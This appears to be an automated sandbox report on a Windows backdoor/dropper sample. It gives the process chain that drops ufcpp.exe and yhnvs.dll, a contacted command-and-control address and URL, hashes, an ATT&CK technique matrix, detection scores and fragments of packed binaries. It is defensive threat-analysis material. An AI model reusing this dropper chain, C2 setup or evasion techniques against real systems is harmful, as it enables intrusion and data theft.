Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_100100A0 GetLocalTime,SystemTimeToFileTime,5_2_100100A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_10006BF0 Sleep,GetVersionExA,CreateThread,sprintf,5_2_10006BF0

Stealing of Sensitive Information

Source: C:\Windows\SysWOW64\rundll32.exe Device IO: \Device\Harddisk0\DR0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_100055E0 WSAStartup,socket,socket,socket,htons,htons,inet_addr,inet_addr,htons,inet_addr,bind,ioctlsocket,select,Sleep,wsprintfA,malloc,htons,htons,htons,htons,htons,htons,htons,inet_addr,closesocket,closesocket,closesocket,5_2_100055E0

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 11 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 Bootkit | 111 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 124 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 11 Registry Run Keys / Startup Folder | 1 Software Packing | NTDS | 11 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 21 Virtualization/Sandbox Evasion | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Virtualization/Sandbox Evasion | DCSync | 11 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 111 Process Injection | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Bootkit | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Rundll32 | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
[Behavior graph, ID 1573196. Sample: otsIBG7J9b.exe; start date: 11/12/2024; architecture: WINDOWS; score: 100. Domains shown: krnaver.com, blogx.sina.com.cn, blog.sina.com.cn. Process chain: otsIBG7J9b.exe drops C:\ufcpp.exe (PE32) and starts cmd.exe, which starts ufcpp.exe, PING.EXE (127.0.0.1) and conhost.exe; ufcpp.exe drops C:\agtve\yhnvs.dll (PE32) and starts rundll32.exe, which connects to 107.163.241.232 (TAKE2US, United States) and blogx.sina.com.cn (202.108.0.52, CHINA169-BJChinaUnicomBeijingProvinceNetworkCN, China).]

Source | Detection | Scanner | Label
otsIBG7J9b.exe | 87% | ReversingLabs | Win32.Backdoor.Venik
otsIBG7J9b.exe | 100% | Avira | TR/Dropper.Gen
otsIBG7J9b.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\ufcpp.exe | 100% | Avira | TR/Dropper.Gen
C:\ufcpp.exe | 100% | Joe Sandbox ML |
C:\agtve\yhnvs.dll | 100% | Joe Sandbox ML |
C:\agtve\yhnvs.dll | 92% | ReversingLabs | Win32.Worm.Palevo
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
blogx.sina.com.cn | 202.108.0.52 | true | false |  | high
krnaver.com | unknown | unknown | true |  | unknown
blog.sina.com.cn | unknown | unknown | false |  | high

Name | Malicious | Antivirus Detection | Reputation
http://107.163.241.232:12354/show.php | true | Avira URL Cloud: safe | unknown
http://blog.sina.com.cn/u/5655029807 | false |  | high
https://blog.sina.com.cn/u/5655029807 | false |  | high

IP | Domain | Country | ASN | ASN Name | Malicious
202.108.0.52 | blogx.sina.com.cn | China | 4808 | CHINA169-BJChinaUnicomBeijingProvinceNetworkCN | false
107.163.241.232 | unknown | United States | 20248 | TAKE2US | true

IP
127.0.0.1

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1573196
Start date and time: 2024-12-11 16:23:33 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: otsIBG7J9b.exe
renamed because original name is a hash value
Original Sample Name: 04cc92b4e0f79ba841ba3c76651c8968d6525d4805829dd875f7a34034ffa460.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@22/3@52/3
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 64
• Number of non-executed functions: 68
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target rundll32.exe, PID 3384 because there are no executed function
• HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: otsIBG7J9b.exe

Time | Type | Description
10:24:30 | API Interceptor | 519746x Sleep call for process: rundll32.exe modified

                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:ISO-8859 text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):2146
                                              Entropy (8bit):4.33510205859581
                                              Encrypted:false
                                              SSDEEP:24:8DXwher+V3MLAYBnaezjezYL4KCQRajERJEennyL/IXdI+Bbq7f/GdSNNUP7wzGb:sLdojGSbGLbg6
                                              MD5:DE59D93CCD3DA4C52AD1F9CA43522D93
                                              SHA1:AD07ACCBDF663ABC37B720376473FEE741B42EDE
                                              SHA-256:1BE0A5BC5909E52ADEDEF33180FD96750367C7F57A6919BFE10481D1B68BF3D7
                                              SHA-512:E00BB020C2AAE3C53CC05551E1687AB20A8DE67047F358332CBF7B345B6F180898BB91681D70318CE77E2CF437BF2D17A63E7405CD781403C6D48291FDC42D39
                                              Malicious:false
                                              Preview:..2024-12-11 13:36..iOffset....2024-12-11 17:04..iOffset....2024-12-11 20:11..iOffset....2024-12-11 23:38..iOffset....2024-12-12 01:49..iOffset....2024-12-12 05:17..iOffset....2024-12-12 08:50..iOffset....2024-12-12 10:33..iOffset....2024-12-12 15:22..iOffset....2024-12-12 17:33..iOffset....2024-12-12 21:17..iOffset....2024-12-12 23:00..iOffset....2024-12-13 03:14..iOffset....2024-12-13 08:39..iOffset....2024-12-13 13:04..iOffset....2024-12-13 18:14..iOffset....2024-12-14 00:22..iOffset....2024-12-14 07:20..iOffset....2024-12-14 19:10..iOffset....2024-12-15 01:33..iOffset....2024-12-15 19:58..iOffset....2024-12-16 04:29..iOffset....2024-12-16 16:59..iOffset....2024-12-17 14:57..iOffset....2024-12-18 00:58..iOffset....2024-12-18 11:10..iOffset....2024-12-18 20:06..iOffset....2025-05-06 23:00..iOffset....2025-09-05 04:25..iOffset....2025-09-27 15:12..iOffset....2025-10-17 18:52..iOffset....2025-11-09 15:01..iOffset....2025-12-15 13:52..iOffset....2026-02-02 16:22..iOffset....2026-03-11 0
                                              Process:C:\ufcpp.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):43464
                                              Entropy (8bit):7.908920555883916
                                              Encrypted:false
                                              SSDEEP:768:t0inj1jJ5OeUMhBNSqHvMjjAipMkuG30sv2xEZkWldADAKPIp:t0ipV5uMhBt0jjAiusv22ZkWTOAKP8
                                              MD5:36E3FB5964D663272CF1169E1E1CA478
                                              SHA1:58115E08B49505BCBBB5C88A28A86222BA18D5D4
                                              SHA-256:C7C41689DE030DF0F78F471422FA2A6383B36E77C94E7F6F124A96FEB3E27ED7
                                              SHA-512:DAFF53B11AA400437A06287707A334A09661C1EF7D0FD8BEAF1A874C79C16FE45BD1188343D0623E839D3EAD5EA2DD90896E37CCF3B252C7220C74989A9BA442
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 92%
                                              Preview:MZ@.....................@.............!.L.!packed by nspack$@...PE..L...u..U...........!................................................................................................. ..8.......x............................ ...............................................................K......................nsp0................................`...nsp1...............................`...............D.................................................... .......K.......................text..................................................UBome........0..........UBome........H...X.................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...................z.......z.?.................................S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.E.4...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...x.(...F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....P.a.g.e. .M.a.n.a.g.e.m.e.n.t. .M.o.d.u.l.e. .f.o.r. .S.c.a.n.S.o.f.t. .S.D.K...>.....F.i.l.e.V.e.r.s.i.o.n.....1.4...0...4.7.3.0...
                                              Process:C:\Users\user\Desktop\otsIBG7J9b.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):72438
                                              Entropy (8bit):7.005065563083021
                                              Encrypted:false
                                              SSDEEP:768:qGHV45EDE477AZbUJx0rZGE3jCELoiMMj6hZ3nE+EXVmkDbjRL8Khc15Z6J1Sb:qG14P477AxUYrZGoC09k0SkTRHhWqPO
                                              MD5:1B4C7D94BCF61F9CCE0B29C2D879EE73
                                              SHA1:C393499F2BE86711B11CA50F74EAE4E88F7690A7
